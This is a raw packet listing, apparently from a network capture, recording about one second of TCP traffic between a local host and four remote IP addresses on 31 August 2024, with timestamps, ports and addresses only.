Aug 31, 2024 15:44:20.198034048 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.198066950 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.198091984 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.240370989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240385056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240401983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240411043 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240420103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240430117 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.240438938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240451097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240459919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.240470886 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.240489006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.240504980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.241338968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.241349936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.241359949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.241381884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.241404057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.242031097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.242043972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.242053986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.242063046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.242070913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.242077112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.242111921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243055105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243063927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243073940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243086100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243097067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243105888 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243107080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243117094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243124008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243128061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243141890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243159056 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243174076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243180990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243187904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243202925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243215084 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243222952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243231058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243233919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243246078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243248940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243257046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243259907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243268013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243294954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243318081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243793011 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.243803024 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.243813992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243838072 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.243859053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243863106 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.243895054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243904114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243913889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243922949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243932962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243933916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243943930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.243964911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.243988991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244024038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244035006 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.244044065 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.244052887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244061947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244071007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244076014 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.244081974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244081974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244091988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244098902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244098902 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.244102001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244113922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244123936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244126081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244126081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244157076 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244160891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244180918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244198084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244225979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244237900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244301081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244311094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244321108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244340897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244342089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244364023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244369984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244379997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244380951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244406939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244417906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244545937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244560003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244575977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244585037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244594097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244600058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244604111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244615078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244622946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244631052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244651079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244663000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244854927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244940996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.244983912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.244993925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245002985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245012999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245023012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245028019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.245038986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245049000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.245052099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.245076895 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.245088100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248589993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248698950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248708010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248717070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248730898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248739958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248744011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248750925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248760939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248773098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248792887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248806000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248893023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248903990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248934984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248939991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248956919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248975992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248981953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.248986006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.248995066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249003887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249005079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249025106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249047995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249392986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249403954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249413013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249442101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249463081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249526024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249536991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249547005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249557972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249566078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.249571085 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.249600887 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253312111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253355026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253417015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253426075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253444910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253453970 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253457069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253468990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253469944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253479958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253489017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253489017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253500938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253504992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253509998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253521919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253531933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253536940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253542900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253556013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253566027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253570080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253578901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253586054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253590107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.253613949 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.253635883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255378008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255388975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255398989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255408049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255424023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255454063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255472898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255484104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255491972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255512953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255513906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255526066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255537033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255538940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255547047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255557060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255567074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255568027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255578041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255578995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255588055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.255603075 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255611897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.255641937 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.271548033 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:20.294436932 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294447899 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294460058 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294478893 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294490099 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294493914 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.294534922 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.294816971 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294828892 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294837952 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.294878960 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.294900894 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.314266920 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:20.330760956 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:20.331012964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331098080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331105947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331119061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331120968 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.331135035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331146002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331156969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331163883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.331167936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.331199884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.331199884 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.331377029 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.332025051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332046986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332056999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332070112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332094908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.332108974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332119942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332129955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332140923 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.332181931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.332181931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.332268000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.332325935 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333683968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333764076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333772898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333782911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333790064 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333795071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333807945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333811045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333859921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333859921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333939075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333950996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333960056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333972931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333985090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.333988905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.333998919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334000111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334013939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334023952 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334033966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334034920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334044933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334065914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334171057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334605932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334616899 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334626913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334696054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334696054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334714890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334727049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334738016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334749937 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334769011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334801912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334813118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334814072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334825039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334836006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334845066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334855080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334861040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334867954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334877968 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334887028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334904909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.334963083 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334974051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334985018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334995031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.334995031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335005999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335017920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335021019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335030079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335041046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335045099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335063934 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335086107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335086107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335110903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335182905 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335216045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335226059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335236073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335247993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335258007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335263014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335273027 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335273981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335285902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.335300922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335339069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335339069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.335513115 CEST	80	49727	52.212.52.84	192.168.2.5
